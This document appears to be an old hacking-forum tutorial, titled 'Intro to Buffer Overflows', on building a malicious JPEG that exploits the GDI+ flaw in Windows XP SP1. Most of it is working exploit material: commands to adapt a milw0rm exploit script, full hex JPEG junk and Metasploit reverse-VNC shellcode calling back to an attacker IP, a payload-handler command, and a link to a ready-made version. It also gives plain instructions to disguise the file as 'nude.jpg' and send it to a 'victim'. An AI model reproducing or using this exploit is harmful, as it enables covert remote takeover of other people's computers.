Intro to Buffer Overflows 
By IMC Tullywacker

Shouts
IMC GrahamPhisher
IMC EXE
IMC TwiZted
IMC PhirePhreak

Insanemasterminds.com
GrahamPhisher.com
remote-exploit.org


Hello, today I am going to be showing you how to perform a buffer overflow on a windows xp sp1 box. I 
am going to be using Backtrack 3 beta as should you to be able to follow along easily.

If you are unfamiliar with buffer overflows I suggest you read up on them before proceeding to the tutorial. 
http://en.wikipedia.org/wiki/Buffer_overflow

Ok lets begin, fire up backtrack.

Open up a new terminal.

Code:

cd /pentest/exploits/milw0rm


ok now lets search the sploitlist for GDI exploits

Code:

cat sploitlist.txt |grep -i GDI


ok now copy the 475.sh sploit to the /tmp/ directory

Code:

cp ./platforms/windows/remote/475.sh /tmp/


now lets edit the file to better suit our needs.

Code:

nano /tmp/475.sh


We need to edit the address of the shellcode for a windows xp sp1 english so comment the 1st line and uncomment the 
2nd like so

Code:

#********************************************
#Address of shellcode
#********************************************
#printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0


Next there are formatting problems in the image junk section that need to be corrected

Code:

#********************************************
#Image junk here...fake JPG
#********************************************
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";


Now lets edit the shellcode area we need to replace \xCC with a NOP (\x90) and fix another formatting issue

Code:

#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\x90\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it works!


Ok next fix yet another formatting issue

Code:

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************


Now the original purpose for this exploit is to add an administrator to the users group as you can see from the line 
above. We are going to be using a reverse vnc connection because a nice GUI is always the most fun.

You can do it if you want just to see that the sploit works, but here at IMC we strive to do shit differently Smiley

Now cd the framework2 directory

Code:

cd /pentest/exploits/framework2


To view all the payloads type

Code:

../msfpayload


We're going to use the win32_reverse_vncinject payload

Now to see what variables are needed to be set we type

Code:

../msfpayload win32_reverse_vncinject


As you can see the only field left blank is the LHOST option so we need our lan ip address

Code:

ifconfig


Code:

inet addr:192.168.1.113


Now we need to get our custom payload and put it into our sploit

Code:

../msfpayload win32_reverse_vncinject LHOST=192.168.1.113 P


This will return the payload that is suited for our needs.

Here's mine

Code:

"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
"\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
"\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
"\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
"\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
"\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
"\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
"\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
"\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
"\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";


So copy your payload and now lets put it in our sploit

Code:

nano /tmp/475.sh


Code:

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!)
#********************************************
printf "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c".
printf "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32".
printf "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07".
printf "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24".
printf "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8".
printf "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64".
printf "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e".
printf "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53".
printf "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4".
printf "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57".
printf "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89".
printf "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59".
printf "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50".
printf "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01".
printf "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59".
printf "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00".
printf "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";


Now we need to set up our payload handler

Code:

../msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=192.168.1.102


Now you need to make your sploit into a .jpg file

Code:

cd /tmp/


Code:

chmod +x 475.sh


Code:

../475.sh > nude.jpg


Now what your going to do is give the victim the file, email, share, whatever up to u.

All you have to do now is sit and wait for the victim to open a folder containing the malicious .jpg file, they 
dont even have to open it! This will spawn a vnc session and give you a gui of the computer.

Congrats on making your 1st malicious jpg file.

For all you lazy people ive uploaded the modified sploit all you have to do is change the payload

Code:

http://imctully.hostaim.com/maliciousjpg.txt


~Tully